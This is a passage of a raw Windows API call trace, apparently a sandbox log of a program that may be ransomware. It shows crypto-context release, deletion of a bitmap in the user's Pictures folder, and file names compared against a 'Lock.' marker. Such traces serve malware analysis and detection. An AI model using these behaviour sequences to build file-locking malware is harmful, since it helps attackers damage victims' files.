(hKey=0x9e1cb8) returned 1 [0209.770] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.770] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.770] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.770] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.770] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.770] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.770] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.770] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.770] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.770] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.770] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.770] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.770] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.771] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.771] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.771] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.771] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.771] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.771] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.771] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.771] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.771] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.771] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.771] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.771] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.771] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.772] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.772] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.772] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.772] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.772] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.772] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.772] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.772] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.772] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.772] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.772] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.772] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.772] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.772] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.772] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.772] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.772] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6fa0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0209.772] CryptReleaseContext (hProv=0xa7c110, dwFlags=0x0) returned 1 [0209.772] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.773] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.773] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.773] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.773] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.773] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.773] FreeLibrary (hLibModule=0x76390000) returned 1 [0209.773] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.773] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.773] CloseHandle (hObject=0x520) returned 1 [0209.773] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.773] CloseHandle (hObject=0x4dc) returned 1 [0209.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.778] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.778] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.778] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.778] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/E8Pb7e.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\E8Pb7e.bmp", lpFilePart=0x8cedf4*="E8Pb7e.bmp") returned 0x23 [0209.778] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\E8Pb7e.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\e8pb7e.bmp")) returned 0x20 [0209.779] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\E8Pb7e.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb36f5700, ftCreationTime.dwHighDateTime=0x1d5ce58, ftLastAccessTime.dwLowDateTime=0x3b49d730, ftLastAccessTime.dwHighDateTime=0x1d5c996, ftLastWriteTime.dwLowDateTime=0x3b49d730, ftLastWriteTime.dwHighDateTime=0x1d5c996, nFileSizeHigh=0x0, nFileSizeLow=0xfbd8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="E8Pb7e.bmp", cAlternateFileName="")) returned 0x9e2238 [0209.779] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\E8Pb7e.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\e8pb7e.bmp")) returned 1 [0209.783] FindNextFileW (in: hFindFile=0x9e2238, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb36f5700, ftCreationTime.dwHighDateTime=0x1d5ce58, ftLastAccessTime.dwLowDateTime=0x3b49d730, ftLastAccessTime.dwHighDateTime=0x1d5c996, ftLastWriteTime.dwLowDateTime=0x3b49d730, ftLastWriteTime.dwHighDateTime=0x1d5c996, nFileSizeHigh=0x0, nFileSizeLow=0xfbd8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="E8Pb7e.bmp", cAlternateFileName="")) returned 0 [0209.783] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0209.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.783] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0209.783] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.784] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0209.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d750 [0209.785] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/E8Pb7e.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\E8Pb7e.bmp", lpFilePart=0x8cf650*="E8Pb7e.bmp") returned 0x23 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d750 | out: hHeap=0x2af0000) returned 1 [0209.785] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\E8Pb7e.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\e8pb7e.bmp")) returned 0xffffffff [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0209.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.786] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0209.786] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.786] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EHKlEyoM3xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HKlEyoM3xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KlEyoM3xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lEyoM3xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EyoM3xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yoM3xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oM3xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.786] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M3xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xoIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oIg8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ig8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ms.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.787] 